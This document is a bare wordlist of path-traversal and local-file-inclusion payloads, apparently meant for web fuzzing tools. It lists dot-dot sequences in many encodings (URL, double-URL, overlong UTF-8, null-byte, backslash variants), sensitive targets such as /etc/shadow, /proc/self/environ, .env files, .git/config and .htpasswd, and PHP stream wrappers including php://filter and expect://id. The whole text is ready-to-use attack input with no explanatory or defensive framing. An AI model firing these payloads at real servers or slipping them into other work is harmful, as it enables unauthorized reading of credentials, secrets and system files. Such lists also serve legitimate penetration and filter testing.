../
../../
../../../
../../../../
../../../../../
../../../../../../
../../../../../../../
../../../../../../../../
../../../../../../../../../
../../../../../../../../../../
../../../../../../../../../../../
..%2f
..%2f..%2f
..%2f..%2f..%2f
..%2f..%2f..%2f..%2f
..%2f..%2f..%2f..%2f..%2f
..%5c
..%5c..%5c
..%5c..%5c..%5c
..%255c
..%255c..%255c
....//
....//....//
....//....//....//
..;/
..;/..;/
..;/..;/..;/
..%00/
..%00/..%00/
..%0a/
..%0d/
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/hostname
/etc/issue
/etc/motd
/proc/self/environ
/proc/version
/proc/cmdline
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/windows/win.ini
/windows/system32/drivers/etc/hosts
c:/windows/win.ini
c:/windows/system32/drivers/etc/hosts
/var/www/html/.env
/var/www/.env
/.env
/.git/config
/.git/HEAD
/.svn/entries
/.svn/wc.db
/WEB-INF/web.xml
/META-INF/MANIFEST.MF
../../../etc/passwd
../../../etc/shadow
../../../../../../etc/passwd
../../../../../../etc/shadow
../../../../../../../etc/passwd
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2fetc%2fshadow
%2e%2e%2f
%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f
..%252f
..%252f..%252f
..%c0%af
..%c1%9c
..\
..\..\
..\..\..\
..\..\..\..\
..\..\..\..\..\
..%5c..%5c
..%5c..%5c..%5c
..%5c..%5c..%5c..%5c
.%2e/
.%2e/.%2e/
.%2e/.%2e/.%2e/
%2e%2e/
%2e%2e/%2e%2e/
%2e%2e/%2e%2e/%2e%2e/
%252e%252e/
%252e%252e/%252e%252e/
/..;/
/../
/../../../
/.../.../
/..../..../
..\/
..\/../
.\/..\
.%00.
..%00
..%0d
..%0a
php://filter/convert.base64-encode/resource=index.php
php://filter/resource=../../../etc/passwd
php://input
file:///etc/passwd
file:///c:/windows/win.ini
expect://id
data://text/plain;base64,
.git/HEAD
.git/config
.svn/entries
.htaccess
.htpasswd
web.config
composer.json
package.json
yarn.lock
Dockerfile
docker-compose.yml